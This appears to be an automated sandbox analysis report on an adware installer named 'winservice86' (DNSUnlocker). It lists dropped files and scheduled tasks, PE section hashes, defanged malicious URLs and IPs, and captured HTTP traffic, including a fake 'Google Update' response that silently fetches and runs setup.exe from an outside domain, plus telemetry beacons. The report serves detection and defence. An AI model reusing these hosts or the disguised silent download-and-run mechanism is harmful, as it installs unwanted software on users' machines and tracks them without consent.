%Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
%Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
%Program Files%\winservice86\utils.exe (76825 bytes)
%WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
%Program Files%\winservice86\Uninstall.exe (601 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.35.9.29
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 34880 | 35328 | 4.13209 | c061a4f004f4d6347691f4655fa02103 |
.data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
.rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
.bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
.ndata | 319488 | 8765440 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
.rsrc | 9084928 | 12440 | 12800 | 2.0553 | 715d118c4337fd84e426a690557b0baa |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/002201/update.json | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 | |
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 | |
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
hxxp://e6845.dscb1.akamaiedge.net/ThawteTimestampingCA.crl | |
hxxp://e6845.dscb1.akamaiedge.net/tss-ca-g2.crl | |
hxxp://crl.usertrust.com/UTN-USERFirst-Object.crl | 178.255.83.2 |
hxxp://cds.d5k9g9i8.hwcdn.net/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 | |
hxxp://crl.comodoca.com.cdn.cloudflare.net/COMODOCodeSigningCA2.crl | 104.16.89.188 |
hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg | |
hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 | |
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/390.js?ver=1&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/424.js?ver=3&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/391.js?ver=1&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/223.js?ver=9&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/200.js?ver=6&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/273.js?ver=6&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/288.js?ver=4&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/311.js?ver=4&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/339.js?ver=3&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/380.js?ver=1&rnd=41 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/220.js?ver=46&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/184.js?ver=11&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/180.js?ver=20&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/102.js?ver=15&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/91.js?ver=186&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/376.js?ver=12&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/354.js?ver=2&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/345.js?ver=47&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/253.js?ver=2&rnd=8467 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/246.js?ver=17&rnd=8467 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 | |
hxxp://fallback.global-ssl.fastly.net/download/66/60001/DNSUnlocker/setup.exe | |
hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 | |
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 | |
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 | |
hxxp://js.newcloudrack.com/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 | 69.16.175.10 |
hxxp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/setup.exe | 185.31.17.249 |
hxxp://js.newcloudrack.com/plugins/mins/273.js?ver=6&rnd=41 | 69.16.175.10 |
hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 | 69.16.175.42 |
hxxp://js.newcloudrack.com/plugins/mins/376.js?ver=12&rnd=8467 | 69.16.175.10 |
hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 | 54.231.17.4 |
hxxp://update.newdemoonlinecloud.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 | 69.16.175.10 |
hxxp://crl.thawte.com/ThawteTimestampingCA.crl | 23.50.101.163 |
hxxp://js.newcloudrack.com/plugins/mins/220.js?ver=46&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/180.js?ver=20&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/311.js?ver=4&rnd=41 | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 | 54.231.17.4 |
hxxp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/391.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://update.newdemoonlinecloud.com/installer_updates/002201/update.json | 69.16.175.10 |
hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 | 69.16.175.42 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | 77.222.148.99 |
hxxp://js.newcloudrack.com/plugins/mins/223.js?ver=9&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/91.js?ver=186&rnd=8467 | 69.16.175.10 |
hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 | 69.16.175.42 |
hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/288.js?ver=4&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/184.js?ver=11&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/345.js?ver=47&rnd=8467 | 69.16.175.10 |
hxxp://crl.comodoca.com/COMODOCodeSigningCA2.crl | 104.16.89.188 |
hxxp://stats.newdemoonlinecloud.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 | 54.231.17.4 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 77.222.148.99 |
hxxp://js.newcloudrack.com/plugins/mins/424.js?ver=3&rnd=41 | 69.16.175.10 |
hxxp://logs.newdemoonlinecloud.com/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 | 69.16.175.42 |
hxxp://js.newcloudrack.com/plugins/mins/380.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/102.js?ver=15&rnd=8467 | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 | 54.231.17.4 |
hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl | 23.50.101.163 |
hxxp://js.newcloudrack.com/plugins/mins/246.js?ver=17&rnd=8467 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/339.js?ver=3&rnd=41 | 69.16.175.10 |
hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 | 69.16.175.42 |
hxxp://js.newcloudrack.com/plugins/mins/390.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/200.js?ver=6&rnd=41 | 69.16.175.10 |
hxxp://js.newcloudrack.com/plugins/mins/354.js?ver=2&rnd=8467 | 69.16.175.10 |
hxxp://stats.newdemoonlinecloud.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 | 54.231.17.4 |
hxxp://js.newcloudrack.com/plugins/mins/253.js?ver=2&rnd=8467 | 69.16.175.10 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1456422146"
Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT
Cache-Control: private, must-revalidate, max-age=900
Content-Length: 1681
Content-Type: application/xml; charset=utf-8
X-HW: 1456422155.dop003.fr7.t,1456422155.cds047.fr7.pr
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>151</Ver>. <ShortName>winservice86</ShortName>. <Description>winservice</Description>. <PublisherName>Corporate Inc</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>17</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>fa
<<< skipped >>>
GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp;cup
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
If-Match: "XX-K_Z3raSdv_NbJiy9qMtWg5rI"
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 412 Precondition Failed
Date: Thu, 25 Feb 2016 17:42:22 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1454605844"
Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT
Cache-Control: max-age=21600
Content-Length: 993
Content-Type: text/xml; charset=UTF-8
X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.sr,1456422142.dop003.se1.r,1456422142.cds006.se1.pr,1456422142.cds029.fr7.pr
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96}" status="ok">. <updatecheck status="ok">. <urls>. <url codebase="hXXp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/"/>. </urls>. <manifest version="1.3.25.36">. <packages>. <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="setup.exe" required="true" size="1141502"/>. </packages>. <actions>. <action arguments="/verysilent" event="update" run="setup.exe" />. <action version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>. </actions>. </manifest>. </updatecheck>. <ping status="ok"/>. </app>.</response>.....
<<< skipped >>>
GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x8004219c
